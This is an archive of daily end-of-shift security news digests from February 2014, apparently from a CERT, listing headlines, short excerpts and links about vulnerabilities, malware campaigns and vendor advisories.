======================= = End-of-Shift report = ======================= Timeframe: Mittwoch 19-02-2014 18:00 − Donnerstag 20-02-2014 18:00 Handler: Alexander Riepl Co-Handler: Christian Wojner *** Malicious iFrame Injections Host Payload on Tumblr *** --------------------------------------------- It's always fun to watch malware developers using different techniques to code their creations. Sometimes it's a matter of obfuscation, placement, injection, but this time it's how they code it to be dynamic. I believe this is not the first one that uses this service, but it's the first time I'm seeing .. --------------------------------------------- http://blog.sucuri.net/2014/02/malicious-iframe-injections-host-payload-on-… *** Health Care Systems Poorly Protected, Many Already Compromised *** --------------------------------------------- New report shows that health care industry intellectual property, payment information, and patient data are poorly protected and, in many cases, already compromised. --------------------------------------------- http://threatpost.com/health-care-systems-poorly-protected-many-already-com… *** Microsoft release FixIt for IE9/IE10 Zero Day, (Thu, Feb 20th) *** --------------------------------------------- Microsoft has published a TechNet article detailing the availability of a "FixIt" for the current IE9/IE10 zero day which has been doing the rounds. Corporate users will presumably have to wait until the availability of the patch which Microsoft say will be released during the monthly patching cycle.. --------------------------------------------- http://isc.sans.edu/diary.html?storyid=17684&rss *** Microsoft Security Advisory (2934088) *** --------------------------------------------- Microsoft is aware of limited, targeted attacks that attempt to exploit a vulnerability in Internet Explorer 10. Only Internet Explorer 9 and Internet Explorer 10 are affected by this vulnerability. Other supported versions of Internet Explorer are not affected. Applying the Microsoft Fix it solution, "MSHTML Shim Workaround," prevents .. --------------------------------------------- https://technet.microsoft.com/en-us/security/advisory/2934088 *** Fritzbox-Lücke: Jetzt auch bei WLAN-Repeatern *** --------------------------------------------- Auf den Routern haben zwar längst noch nicht alle Nutzer die Sicherheitslücke gestopft, aber zumindest stehen Firmware-Updates bereit. Nun bessert AVM auch die Software anderer Produkte mit WLAN-Schnittstelle aus. --------------------------------------------- http://www.heise.de/security/meldung/Fritzbox-Luecke-Jetzt-auch-bei-WLAN-Re… *** Datenbank-Leck in Leoben, Hack-Angriff auf Energie Steiermark *** --------------------------------------------- Zusammenhang beider Vorfälle möglich - Zugriff auf Gas-Kundendaten bei Energie Steiermark --------------------------------------------- http://derstandard.at/1392685633659 *** eXtplorer Joomla! Authentication Bypass Security Issue *** --------------------------------------------- https://secunia.com/advisories/57022 *** SA-CONTRIB-2014-022 - Slickgrid - Access bypass *** --------------------------------------------- The module doesnt check access sufficiently, allowing users to .. --------------------------------------------- https://drupal.org/node/2200491 *** Drupal Maestro 7.x Cross Site Scripting *** --------------------------------------------- http://cxsecurity.com/issue/WLB-2014020165 *** [remote] - MediaWiki Thumb.php Remote Command Execution *** --------------------------------------------- http://www.exploit-db.com/exploits/31767

1 0

Tageszusammenfassung - Mittwoch 19-02-2014
by Daily end-of-shift report 19 Feb '14

19 Feb '14

======================= = End-of-Shift report = ======================= Timeframe: Dienstag 18-02-2014 18:00 − Mittwoch 19-02-2014 18:00 Handler: Alexander Riepl Co-Handler: Christian Wojner *** Time to Harden Your Hardware? *** --------------------------------------------- Most Internet users are familiar with the concept of updating software that resides on their computers. But this past week has seen alerts about an unusual number of vulnerabilities and attacks against some important and ubiquitous hardware devices, from consumer-grade Internet routers, data storage and home automation products to enterprise-class security solutions. --------------------------------------------- http://krebsonsecurity.com/2014/02/time-to-harden-your-hardware/ *** 2013 DataBreach Report By Risk Based Security *** --------------------------------------------- Today Riskbasedsecurity.com has announced a report that covers the 2013 period for databreaches of all kinds. --------------------------------------------- http://www.cyberwarnews.info/2014/02/19/2013-databreach-report-by-risk-base… *** Lets Talk About Your Security Breach with Metasploit. Literally. In Real Time. *** --------------------------------------------- During a recent business trip in Boston, Tod and I sat down in a bar with the rest of the Metasploit team, and shared our own random alcohol-driven ideas on Metasploit hacking. At one point we started talking about hacking webcams. At that time Metasploit could only list webcams, take a snapshot, stream (without sound), or record audio using a meterpreter... --------------------------------------------- https://community.rapid7.com/community/metasploit/blog/2014/02/18/lets-talk… *** 300,000 Usernames, Passwords Posted to Pastebin *** --------------------------------------------- More than 300,000 credentials were posted on the clipboard website Pastebin.com in the year 2013 alone according to a recent analysis by a Swiss security firm. --------------------------------------------- http://threatpost.com/300000-usernames-passwords-posted-to-pastebin/104333 *** Smartphones und Tablets: Exploit-Code für 14 Monate altes Android-Sicherheitsloch *** --------------------------------------------- Für eine seit 14 Monaten bekannte Sicherheitslücke in Android ist Exploit-Code für das Framework Metasploit veröffentlicht worden. Ein Sicherheitsforscher kritisiert, dass die meisten im Umlauf befindlichen Android-Geräte die Sicherheitslücke aufweisen. --------------------------------------------- http://www.golem.de/news/smartphones-und-tablets-exploit-code-fuer-14-monat… *** Detected new Zeus variant which makes use of steganography *** --------------------------------------------- Security experts at Malwarebytes detected a new of the popular Zeus banking trojan variant which makes use of steganography to hide the configuration file. --------------------------------------------- http://securityaffairs.co/wordpress/22334/malware/zeus-banking-malware-nest… *** Hack gegen AVM-Router: AVM veröffentlicht Liste betroffener Fritzboxen *** --------------------------------------------- Nach langem Hin und Her hat AVM jetzt eine Liste aller Fritzboxen veröffentlicht, die deren genauen Sicherheitsstatus dokumentiert. Für zwei der betroffenen Geräte steht noch kein Update bereit und einige Fragen bleiben weiterhin offen. --------------------------------------------- http://www.heise.de/security/meldung/Hack-gegen-AVM-Router-AVM-veroeffentli… *** Admin rights key to mitigating vulnerabilities, study shows *** --------------------------------------------- Its been best-practice for a very long time: all users and processes should run with the fewest privileges necessary. This limits the damage that can be done by an attacker if the user or process is compromised. --------------------------------------------- http://www.zdnet.com/admin-rights-key-to-mitigating-vulnerabilities-study-s… *** Second Group Seen Using IE 10 Zero Day *** --------------------------------------------- There are at least two different groups running attacks exploiting the recently published zero day vulnerability in Internet Explorer 10, and researchers say one of the groups used the bug to impersonate a French aerospace manufacturer and compromise victims visiting the spoofed Web page. The attackers also used a special feature of .. --------------------------------------------- http://threatpost.com/second-group-seen-using-ie-10-zero-day/104344 *** Security Bulletins: SSL Certificate Validation Vulnerability in the Citrix ShareFile Mobile Application for Android and the Citrix ShareFile Mobile for Tablets Application for Android *** --------------------------------------------- --------------------------------------------- http://support.citrix.com/article/CTX140303 *** MediaWiki Thumb.php Remote Command Execution *** --------------------------------------------- Topic: MediaWiki Thumb.php Remote Command Execution --------------------------------------------- http://cxsecurity.com/issue/WLB-2014020153 *** Ruby on Rails Multiple Vulnerabilities *** --------------------------------------------- Ruby on Rails Multiple Vulnerabilities --------------------------------------------- https://secunia.com/advisories/56964

1 0

Tageszusammenfassung - Dienstag 18-02-2014
by Daily end-of-shift report 18 Feb '14

18 Feb '14

======================= = End-of-Shift report = ======================= Timeframe: Montag 17-02-2014 18:00 − Dienstag 18-02-2014 18:00 Handler: Alexander Riepl Co-Handler: Robert Waldner *** Wait a minute... that's not a real JPG! *** --------------------------------------------- When attackers compromise a website and want to harvest credit cards, they need to either find where the data is stored or capture the data in transit. This blog post shows how identifying files with false file signatures can uncover malicious activity on a server. I recently discovered credit card data hidden behind a .jpg extension that lead me to the work of an attacker capturing credit cards from customers using an online checkout page. --------------------------------------------- http://feedproxy.google.com/~r/SpiderlabsAnterior/~3/3m5-LV3n59k/wait-a-min… *** [2014-02-18] Critical vulnerabilities in Symantec Endpoint Protection *** --------------------------------------------- Attackers are able to completely compromise the Symantec Endpoint Protection Manager server as they can gain access at the system and database level because of critical XXE and SQL injection vulnerabilities. Furthermore attackers can manage all endpoints and possibly deploy attacker-controlled code on clients. --------------------------------------------- https://www.sec-consult.com/fxdata/seccons/prod/temedia/advisories_txt/2014… *** Scanning for Symantec Endpoint Manager, (Mon, Feb 17th) *** --------------------------------------------- Last week, we mentioned a new vulnerability in Symantec Endpoint Protection Management. According to Symantecs advisory, this product listens on port 9090 and 8443/TCP. Both ports are scanned regularly for various vulnerabilities, in particular 8443, being that it is frequently used by web servers as an alternative to 443. However, on February 7th, we detected a notable increase in scans for both ports. --------------------------------------------- http://isc.sans.edu/diary.html?storyid=17657&rss *** GE Proficy Vulnerabilities *** --------------------------------------------- OVERVIEW Researchers amisto0x07 and Z0mb1E of Zero Day Initiative (ZDI) have identified two vulnerabilities in the General Electric (GE) Proficy human-machine interface/supervisory control and data acquisition (HMI/SCADA) - CIMPLICITY application. GE has released security advisories, GEIP13-05 and GEIP13-06, to inform customers about these vulnerabilities.These vulnerabilities could be exploited remotely. --------------------------------------------- http://ics-cert.us-cert.gov/advisories/ICSA-14-023-01 *** PHP Backdoors: Hidden With Clever Use of Extract Function *** --------------------------------------------- When a site gets compromised, one thing we know for sure is that attackers love to leave malware that allows them access back to the site; this type of malware is called a backdoor. --------------------------------------------- http://feedproxy.google.com/~r/sucuri/blog/~3/kPCRBZwe1mQ/php-backdoors-hid… *** A journey to CVE-2014-0497 exploit *** --------------------------------------------- Last week we published a blog post about a CVE-2013-5330 exploit. We've also recently seen a new, similar attack targeting a patched Adobe Flash Player vulnerability (CVE-2014-0497). The vulnerability related to this malware was addressed with a patch released by Adobe on February 4, 2014. Flash Player versions 12.0.0.43 and earlier are vulnerable. We analyzed how these attacks work and found the following details. --------------------------------------------- http://blogs.technet.com/b/mmpc/archive/2014/02/17/a-journey-to-cve-2014-04… *** WordPress two-factor login plugin bug, er, bypasses 2-factor login *** --------------------------------------------- Cross-site vulnerability exposes bloggers The maker of a popular plugin that provides two-factor authentication for WordPress bloggers is preparing an update - after finding a vulnerability in its system. It advises that anyone using two-factor plugins from any vendor need to check their security strength. --------------------------------------------- http://go.theregister.com/feed/www.theregister.co.uk/2014/02/18/wordpress_2… *** VU#656302: Belkin Wemo Home Automation devices contain multiple vulnerabilities *** --------------------------------------------- Vulnerability Note VU#656302 Belkin Wemo Home Automation devices contain multiple vulnerabilities Original Release date: 18 Feb 2014 | Last revised: 18 Feb 2014 Overview Belkin Wemo Home Automation devices contain multiple vulnerabilities. Description CWE-321: Use of Hard-coded Cryptographic Key - CVE-2013-6952Belkin Wemo Home Automation firmware contains a hard-coded cryptographic key and password. An attacker may be able to extract the key and password to sign a malicious firmware --------------------------------------------- http://www.kb.cert.org/vuls/id/656302 *** SSA-892342 (Last Update 2014-02-18): Denial-of-Service Vulnerability in RuggedCom ROS-based Devices *** --------------------------------------------- Summary: A potential vulnerability might allow attackers to perform a Denial-of-Service attack over the network without authentication on RuggedCom products running ROS. RuggedCom and Siemens address this issue by a firmware update. AFFECTED PRODUCTS All RuggedCom ROS-based devices with: All ROS versions before 3.11 ROS 3.11 (for RS950G): all versions ROS 3.12: all versions < ROS v3.12.4 ROS 4.0 (for RSG2488) --------------------------------------------- https://www.siemens.com/innovation/pool/de/forschungsfelder/siemens_securit… *** Exploit Released for Vulnerability Targeted By Linksys Router Worm *** --------------------------------------------- Technical details about a vulnerability in Linksys routers thats being exploited by a new worm have been released Sunday along with a proof-of-concept exploit and a larger than earlier expected list of potentially vulnerable device models. --------------------------------------------- http://www.cio.com/article/748352/Exploit_Released_for_Vulnerability_Target…

1 0

Tageszusammenfassung - Montag 17-02-2014
by Daily end-of-shift report 17 Feb '14

17 Feb '14

======================= = End-of-Shift report = ======================= Timeframe: Freitag 14-02-2014 18:00 − Montag 17-02-2014 18:00 Handler: Alexander Riepl Co-Handler: Christian Wojner *** Not Just Pills or Payday Loans, It's Essay SEO SPAM! *** --------------------------------------------- Remember back in school or college when you had to write pages and pages of long essays, but you had no time write them? Or maybe you were just too lazy? Yeah, good times. Well, it seems like some companies are trying to end this problem. They are offering services where clients pay .. --------------------------------------------- http://blog.sucuri.net/2014/02/not-just-pills-or-payday-loans-its-essay-seo… *** New IE 10 Zero Day Targeting Military Intelligence *** --------------------------------------------- A new campaign, dubbed Operation SnowMan, has been spotted leveraging a previously unknown zero-day in Internet Explorer 10 to compromise the U.S. Veterans of Foreign Wars website this week. --------------------------------------------- http://threatpost.com/new-ie-10-zero-day-targeting-military-intelligence/10… *** Microsoft Internet Explorer 10 remote code execution exploit *** --------------------------------------------- Microsoft Internet Explorer 10 remote code execution exploit, Use-after-free vulnerability in Microsoft Internet Explorer 10 allows remote attackers to execute arbitrary code via vectors in... --------------------------------------------- http://cxsecurity.com/issue/WLB-2014020123 *** The New Normal: 200-400 Gbps DDoS Attacks *** --------------------------------------------- KrebsOnSecurity has been targeted by countless denial-of-service attacks intended to knock it offline. Earlier this week, KrebsOnSecurity was hit by easily the most massive and intense such attack yet -- a nearly 200 Gpbs assault leverging a simple attack method that industry experts is becoming alarmingly common. --------------------------------------------- http://krebsonsecurity.com/2014/02/the-new-normal-200-400-gbps-ddos-attacks/ *** More Malware Embedded in RTFs *** --------------------------------------------- RTF (Rich Text Format) files have been used before by cybercriminals, but of late it seems their use of this format is becoming more creative. We have earlier talked about how CPL files were being embedded in RTF files and sent to would-be victims as an e-mail attachment. These CPL files would then proceed to download malicious .. --------------------------------------------- http://blog.trendmicro.com/trendlabs-security-intelligence/more-malware-emb… *** More on HNAP - What is it, How to Use it, How to Find it, (Sat, Feb 15th) *** --------------------------------------------- Weve had a ton of discussion on the most recent set of home router vulnerabilities based on the HNAP protocol. But what is the HNAP protocol for, and why is it so persistently enabled? HNAP (Home Network Administration Protocol) is a network device management protocol, useful for anyone, but I think meant primarily for ISPs to manage fleets of .. --------------------------------------------- http://isc.sans.edu/diary.html?storyid=17648&rss *** Crowdfunding-Plattform Kickstarter gehackt *** --------------------------------------------- Die Crowdfunding-Plattform Kickstarter wurde Opfer eines Hackerangriffs. Jenseits von Benutzernamen und Mail-Adressen griffen die Hacker auch auf verschlüsselte Passwörter zu. --------------------------------------------- http://www.heise.de/security/meldung/Crowdfunding-Plattform-Kickstarter-geh… *** Zugangsdaten im Umlauf: FTP-Server von Webseiten angegriffen *** --------------------------------------------- Es sollen wohl tausende Zugangsdaten zu FTP-Servern im Umlauf sein, darunter auch Zugänge für bekannte Webseiten. Erste Fälle, in denen Schadinhalte auf Webseiten wie der New York Times untergebracht wurden, gab es schon. (Virus, Server-Applikationen) --------------------------------------------- http://www.golem.de/news/zugangsdaten-im-umlauf-ftp-server-von-webseiten-an… *** HP Data Protector EXEC_BAR Remote Command Execution *** --------------------------------------------- Topic: HP Data Protector EXEC_BAR Remote Command Execution, import argparse import socket .. --------------------------------------------- http://cxsecurity.com/issue/WLB-2014020134 *** WebSphere Application Server Multiple Java Vulnerabilities *** --------------------------------------------- WebSphere Application Server Multiple Java Vulnerabilities --------------------------------------------- https://secunia.com/advisories/56778 *** Mapping Hacking Team's "Untraceable" Spyware *** --------------------------------------------- Remote Control System (RCS) is sophisticated computer spyware marketed and sold exclusively to governments by Milan-based Hacking Team. Hacking Team was first thrust into the public spotlight in 2012 when RCS was used against award-winning Moroccan media outlet Mamfakinch, and United Arab Emirates (UAE) human rights activist Ahmed Mansoor. Most recently, Citizen Lab research found that RCS was used to target Ethiopian journalists in the Washington DC area. --------------------------------------------- https://citizenlab.org/2014/02/mapping-hacking-teams-untraceable-spyware/

1 0

Tageszusammenfassung - Freitag 14-02-2014
by Daily end-of-shift report 14 Feb '14

14 Feb '14

======================= = End-of-Shift report = ======================= Timeframe: Donnerstag 13-02-2014 18:00 − Freitag 14-02-2014 18:00 Handler: Stephan Richter Co-Handler: n/a *** Angriffe über Zero-Day-Lücke im Internet Explorer *** --------------------------------------------- Im IE klafft eine kritische Schwachstelle, durch die man seinen Rechner beim Surfen mit Schadcode infizieren kann. Sie wird bereits für gezielte Cyber-Angriffe missbraucht. --------------------------------------------- http://www.heise.de/security/meldung/Angriffe-ueber-Zero-Day-Luecke-im-Inte… http://www.securitytracker.com/id/1029765 http://www.kb.cert.org/vuls/id/732479 *** BSI warnt Admins: "Zahlreiche deutsche Server mit Ebury-Rootkit infiziert" *** --------------------------------------------- Das CERT-Bund hat das Linux-Rootkit bereits auf hunderten deutschen Servern lokalisiert; vermutlich sind deutlich mehr betroffen. Admins sollten ihr System jetzt testen. --------------------------------------------- http://www.heise.de/security/meldung/BSI-warnt-Admins-Zahlreiche-deutsche-S… *** Bizarre attack infects Linksys routers with self-replicating malware *** --------------------------------------------- Some 1,000 devices have been hit by the worm, which seeks out others to infect. --------------------------------------------- http://feeds.arstechnica.com/~r/arstechnica/security/~3/9tO67obVxlY/story01… *** Apples iCloud verschickt und empfängt Mail im Klartext *** --------------------------------------------- Ein kurzer Nachtest von Apples iCloud-Mail-Diensten förderte zu Tage, dass Apples Mail-Server weniger Schutz vor Schnüfflern bieten als fast aller anderen Mail-Provider. --------------------------------------------- http://www.heise.de/security/meldung/Apples-iCloud-verschickt-und-empfaengt… *** DoubleClick malvertising campaign exposes long-run beneath the radar malvertising infrastructure *** --------------------------------------------- Today, at 2014-02-12 12:16:20 (CET), we became aware of a possible evasive/beneath the radar malvertising based g01pack exploit kit attack, taking place through the DoubleClick ad network using an advertisement featured at About.com. Investigating further, we were able to identify the actual domains/IPs involved in the campaign, and perhaps most interestingly, managed to establish a rather interesting connection between the name servers of one of the domains involved in the attacks, and what... --------------------------------------------- http://www.webroot.com/blog/2014/02/14/doubleclick-malvertising-campaign-ex… *** SYM14-004 Symantec Endpoint Protection Management Vulnerabilities *** --------------------------------------------- On Tuesday, February 18, SEC Consult Vulnerability Lab, an Austrian-based security consultancy, is planning to release an advisory to the public regarding vulnerabilities that it found within Symantec Endpoint Protection. For additional information on the SYM14-004 vulnerability, read the Symantec Security Response SYM14-004 Security Advisory. --------------------------------------------- http://www.symantec.com/business/support/index?page=content&id=TECH214866 http://www.symantec.com/security_response/securityupdates/detail.jsp?fid=se… http://www.heise.de/security/meldung/Update-fuer-kritische-Luecken-im-Syman… *** CA 2E Web Option Unauthenticated Privilege Escalation *** --------------------------------------------- Topic: CA 2E Web Option Unauthenticated Privilege Escalation Risk: Medium Text:Vulnerability title: Unauthenticated Privilege Escalation in CA 2E Web Option CVE: CVE-2014-1219 Vendor: CA Product: 2E W... --------------------------------------------- http://cxsecurity.com/issue/WLB-2014020111 http://www.securityfocus.com/archive/1/531064 *** GnuTLS Intermediate Certificate Processing Flaw May Let Remote Users Bypass Certificate Validation *** --------------------------------------------- http://www.securitytracker.com/id/1029766 *** Bugtraq: Critical security flaws in Nagios NRPE client/server crypto *** --------------------------------------------- http://www.securityfocus.com/archive/1/531063

1 0

Tageszusammenfassung - Donnerstag 13-02-2014
by Daily end-of-shift report 13 Feb '14

13 Feb '14

======================= = End-of-Shift report = ======================= Timeframe: Mittwoch 12-02-2014 18:00 − Donnerstag 13-02-2014 18:00 Handler: Stephan Richter Co-Handler: n/a *** In the wild: Phony SSL certificates impersonating Google, Facebook, and iTunes *** --------------------------------------------- Bogus credentials may be enough to ensnare some smartphone apps, researchers say. --------------------------------------------- http://feeds.arstechnica.com/~r/arstechnica/security/~3/_AvaaGHbDLo/story01… *** Gameover Zeus most active banking trojan in 2013, researchers report *** --------------------------------------------- The most active banking trojan of 2013 was the Gameover variant Zeus, according to the latest research by the experts with the Dell SecureWorks Counter Threat Unit. --------------------------------------------- http://www.scmagazine.com/gameover-zeus-most-active-banking-trojan-in-2013-… *** Decoding Domain Generation Algorithms (DGAs) - Part I *** --------------------------------------------- Part 1 - Unpacking the binary to properly view it in IDA Pro --------------------------------------------- http://vrt-blog.snort.org/2014/02/decoding-domain-generation-algorithms.html *** Weekly Metasploit Update: Android WebView Exploit, Clipboard Monitor, and Mass Checks *** --------------------------------------------- Weekly Metasploit Update: Android WebView Exploit, Clipboard Monitor, and Mass Checks --------------------------------------------- https://community.rapid7.com/community/metasploit/blog/2014/02/13/weekly-me… *** TYPO3: Several vulnerabilities in third party extensions *** --------------------------------------------- Several vulnerabilities have been found in the following third-party TYPO3 extensions: alpha_sitemap, femanager ke_stats, outstats, px_phpids, smarty, wec_map --------------------------------------------- http://typo3.org/news/article/several-vulnerabilities-in-third-party-extens… *** python-gnupg Command Injection Vulnerabilities *** --------------------------------------------- https://secunia.com/advisories/56616 *** Security Bulletin: Multiple vulnerabilities in current IBM SDK for Java for WebSphere Application Server January 2014 CPU *** --------------------------------------------- Multiple security vulnerabilities exist in the IBM SDK for Java that is shipped with IBM WebSphere Application Server. CVE(s): CVE-2014-0411 Affected product(s) and affected version(s): SDK shipped with IBM WebSphere Application Server Version 8.5.0.0 through 8.5.5.1, Version 8.0.0.0 through 8.0.0.8, Version 7.0.0.0 through 7.0.0.31, Version 6.1.0.0 through 6.1.0.47 Refer to the following reference URLs for remediation and additional vulnerability details. --------------------------------------------- https://www-304.ibm.com/connections/blogs/PSIRT/entry/security_bulletin_mul… *** Drupal - Vulnerabilities in third-party Contributions *** --------------------------------------------- https://drupal.org/node/2194135 https://drupal.org/node/2194589 https://drupal.org/node/2194621 https://drupal.org/node/2194639 https://drupal.org/node/2194655 https://drupal.org/node/2194671 https://drupal.org/node/2194809 https://drupal.org/node/2194877 *** SAP NetWeaver Multiple Vulnerabilities *** --------------------------------------------- https://secunia.com/advisories/56947 *** Juniper Networks - 2014-02 Security Threat Response Manager: Multiple vulnerabilities *** --------------------------------------------- Product Affected: STRM series devices and virtual machines with SRTM software releases: 2010.0, 2012.0, 2012.1, 2013.1, 2013.2 --------------------------------------------- http://kb.juniper.net/InfoCenter/index?page=content&id=JSA10614

1 0

Tageszusammenfassung - Mittwoch 12-02-2014
by Daily end-of-shift report 12 Feb '14

12 Feb '14

======================= = End-of-Shift report = ======================= Timeframe: Dienstag 11-02-2014 18:00 − Mittwoch 12-02-2014 18:00 Handler: Stephan Richter Co-Handler: n/a *** Security update available for Adobe Shockwave Player (APSB14-06) *** --------------------------------------------- A Security Bulletin (APSB14-06) has been published regarding an update for Adobe Shockwave Player 12.0.7.148 and earlier for Windows and Macintosh. This update addresses critical vulnerabilities that could potentially allow an attacker to remotely take control of the affected system. --------------------------------------------- http://blogs.adobe.com/psirt/?p=1051 *** Assessing risk for the February 2014 security updates *** --------------------------------------------- Today we released seven security bulletins addressing 31 unique CVEs. Four bulletins have a maximum severity rating of Critical while the other three have a maximum severity rating of Important. We hope that the table below helps you prioritize the deployment of the updates appropriately for your environment. --------------------------------------------- https://blogs.technet.com/b/srd/archive/2014/02/11/assessing-risk-for-the-f… *** Vulnerability in Microsoft Forefront Protection for Exchange Could Allow Remote Code Execution (2927022) *** --------------------------------------------- This security update resolves a privately reported vulnerability in Microsoft Forefront. The vulnerability could allow remote code execution if a specially crafted email message is scanned. This security update is rated Critical for all supported builds of Microsoft Forefront Protection for Exchange 2010. --------------------------------------------- http://technet.microsoft.com/en-us/security/bulletin/ms14-008 *** Attacking ICS Systems "Like Hacking in the 1980s" *** --------------------------------------------- Here's how nuts the world of ICS security is: Jonathan Pollet, a security consultant who specializes in ICS systems, was at a Texas amusement park recently and the ride he was waiting for was malfunctioning. The operator told him the ride used a Siemens PLC as part of the control system, so he went... --------------------------------------------- http://threatpost.com/attacking-ics-systems-like-hacking-in-the-1980s/104200 *** CVE-2014-0050: Exploit with Boundaries, Loops without Boundaries *** --------------------------------------------- In this article I will discuss CVE-2014-0050: Apache Commons FileUpload and Apache Tomcat Denial-of-Service in detail. The article reviews the vulnerabilitys technical aspects in depth and includes recommendations that can help administrators defend from future exploitation of this security issue. How do we know about this vulnerability? About five days ago, Mark Thomas, a Project Management Committee Member and Committer in the Apache Tomcat project, sent an email about the accidentally leaked --------------------------------------------- http://blog.spiderlabs.com/2014/02/cve-2014-0050-exploit-with-boundaries-lo… *** Suspected Mass Exploit Against Linksys E1000 / E1200 Routers, (Wed, Feb 12th) *** --------------------------------------------- Brett, who operates an ISP in Wyoming, notified us that he had a number of customers with compromissed Linksys routers these last couple of days. The routers, once compromissed, scan port 80 and 8080 as fast as they can (saturating bandwidth available). It is not clear which vulnerability is being exploited, but Brett eliminated weak passwords. E1200 routers with the latest firmware (2.0.06) appear to be immune agains the exploit used. E1000 routers are end-of-life and dont appear to have an... --------------------------------------------- http://isc.sans.edu/diary.html?storyid=17621&rss *** Cracking Linksys "Encryption" *** --------------------------------------------- Perusing the release notes for the latest Linksys WRT120N firmware, one of the more interesting comments reads: Firmware 1.0.07 (Build 01) - Encrypts the configuration file. Having previously reversed their firmware obfuscation and patched their code to re-enable JTAG debugging, I thought that surely I would be able to use... --------------------------------------------- http://www.devttys0.com/2014/02/cracking-linksys-crypto/ *** MSRT February 2014 - Jenxcus *** --------------------------------------------- We have been seeing a lot more VBScript malware in recent months, thanks in most part to VBS/Jenxcus. Jenxcus is a worm coded in VBScript that is capable of propagating via removable drives. Its payload opens a backdoor on an infected machine, allowing it to be controlled by a remote attacker. For the past few months we have seen the number of affected machines remain constantly high. For this reason we have included Jenxcus in the February release of the Microsoft Malicious Software... --------------------------------------------- https://blogs.technet.com/b/mmpc/archive/2014/02/11/msrt-february-2014-jenx… *** BSI empfiehlt, dringend Fritz!Box-Update einzuspielen *** --------------------------------------------- Routerhersteller AVM hat am vergangenen Wochenende ein Update für seine Fritz!Box Routermodelle zur Verfügung gestellt, um eine in der letzten Woche bekannt gewordene Schwachstelle zu schließen. --------------------------------------------- https://www.bsi.bund.de/DE/Presse/Pressemitteilungen/Presse2014/Fritz-Box-U… *** MatrikonOPC Improper Input Validation *** --------------------------------------------- Adam Crain of Automatak and independent researcher Chris Sistrunk have identified an improper input validation vulnerability in the MatrikonOPC SCADA DNP3 OPC Server application. MatrikonOPC has produced a patch that mitigates this vulnerability. The researchers have tested the patch to validate that it resolves the vulnerability.This vulnerability could be exploited remotely. --------------------------------------------- http://ics-cert.us-cert.gov/advisories/ICSA-14-010-01 *** Cisco Unified Communications Manager several Vulnerabilities *** --------------------------------------------- http://tools.cisco.com/security/center/content/CiscoSecurityNotice/CVE-2014… http://tools.cisco.com/security/center/content/CiscoSecurityNotice/CVE-2014… http://tools.cisco.com/security/center/content/CiscoSecurityNotice/CVE-2014… http://tools.cisco.com/security/center/content/CiscoSecurityNotice/CVE-2014… http://tools.cisco.com/security/center/content/CiscoSecurityNotice/CVE-2014… http://tools.cisco.com/security/center/content/CiscoSecurityNotice/CVE-2014… http://tools.cisco.com/security/center/content/CiscoSecurityNotice/CVE-2014… http://tools.cisco.com/security/center/content/CiscoSecurityNotice/CVE-2014… *** VU#727318: DELL SonicWALL GMS/Analyzer/UMA contains a cross-site scripting (XSS) vulnerability *** --------------------------------------------- Vulnerability Note VU#727318 DELL SonicWALL GMS/Analyzer/UMA contains a cross-site scripting (XSS) vulnerability Original Release date: 11 Feb 2014 | Last revised: 11 Feb 2014 Overview DELL SonicWALL GMS/Analyzer/UMA version 7.1, and possibly earlier versions, contains a cross-site scripting (XSS) vulnerability. (CWE-79) Description CWE-79: Improper Neutralization of Input During Web Page Generation (Cross-site Scripting)DELL SonicWALL GMS/Analyzer/UMA version 7.1 contains a cross-site... --------------------------------------------- http://www.kb.cert.org/vuls/id/727318 *** FreePBX 2.x Code Execution *** --------------------------------------------- Topic: FreePBX 2.x Code Execution Risk: High Text:App : Freepbx 2.x download : schmoozecom.com Author : i-Hmx mail : n0p1337(a)gmail.com Home : sec4ever.com , secarrays ltd ... --------------------------------------------- http://cxsecurity.com/issue/WLB-2014020088 *** TYPO3 - Several vulnerabilities in third party extensions *** --------------------------------------------- http://typo3.org/news/article/several-vulnerabilities-in-third-party-extens… http://typo3.org/news/article/several-vulnerabilities-in-extension-mm-forum… http://typo3.org/news/article/access-bypass-in-extensions-yet-another-galle… http://typo3.org/news/article/mass-assignment-in-extension-direct-mail-subs… http://typo3.org/news/article/insecure-unserialize-in-extension-news-tt-new… *** [webapps] - NetGear DGN2200 N300 Wireless Router - Multiple Vulnerabilities *** --------------------------------------------- http://www.exploit-db.com/exploits/31617 *** McAfee Firewall Enterprise OpenSSL OCSP Response Verification Denial of Service Vulnerability *** --------------------------------------------- https://secunia.com/advisories/56930 https://secunia.com/advisories/56932 *** [webapps] - jDisk (stickto) v2.0.3 iOS - Multiple Vulnerabilities *** --------------------------------------------- http://www.exploit-db.com/exploits/31618 *** MyBB Extended Useradmininfo Plugin "User-Agent" Script Insertion Vulnerability *** --------------------------------------------- https://secunia.com/advisories/56921 *** Puppet Enterprise - CVE-2013-6393 (Threat of denial of service and potential for arbitrary code execution due to a flaw in libyaml) *** --------------------------------------------- A flaw in the way `libyaml` parsed YAML tags could lead to a heap-based buffer overflow. An attacker could submit a YAML document that, when parsed by an application using `libyaml`, would cause the application to crash or potentially execute malicious code. This has been patched in PE 3.1.3. --------------------------------------------- http://puppetlabs.com/security/cve/cve-2013-6393 *** FFmpeg Multiple Vulnerabilities *** --------------------------------------------- https://secunia.com/advisories/56838

1 0

Tageszusammenfassung - Dienstag 11-02-2014
by Daily end-of-shift report 11 Feb '14

11 Feb '14

======================= = End-of-Shift report = ======================= Timeframe: Montag 10-02-2014 18:00 − Dienstag 11-02-2014 18:00 Handler: Stephan Richter Co-Handler: n/a *** Update (2/10) - Advance Notification Service for February 2014 Security Bulletin Release *** --------------------------------------------- Update as of February 10, 2014 We are adding two updates to the February release. There will be Critical-rated updates for Internet Explorer and VBScript in addition to the previously announced updates scheduled for release on February 11, 2014. These updates have completed testing and will be included in tomorrow's release. This brings the total for Tuesday's release to seven bulletins, four Critical. Please review the ANS summary page for updated information to help customers... --------------------------------------------- http://blogs.technet.com/b/msrc/archive/2014/02/10/advance-notification-ser… *** IBMs remote firmware configuration protocol *** --------------------------------------------- I spent last week looking into the firmware configuration protocol used on current IBM system X servers. IBM provide a tool called ASU for configuring firmware settings, either in-band (ie, running on the machine you want to reconfigure) or out of band (ie, running on a remote computer and communicating with the baseboard management controller - IMM in IBM-speak). Im not a fan of using vendor binaries for this kind of thing. They tend to be large (ASU is a 20MB executable) and difficult to --------------------------------------------- http://mjg59.dreamwidth.org/29210.html *** Das Ende des Magnetstreifens - USA wechseln auf Chip&Pin *** --------------------------------------------- Die USA ist eine Hochburg für den Betrug mit geklauten Kreditkartendaten. Doch ab 2015 soll damit Schluss sein -- Visa und Mastercard stellen auf die in Europa seit langem üblichen Karten mit SmartCard-Chip um. --------------------------------------------- 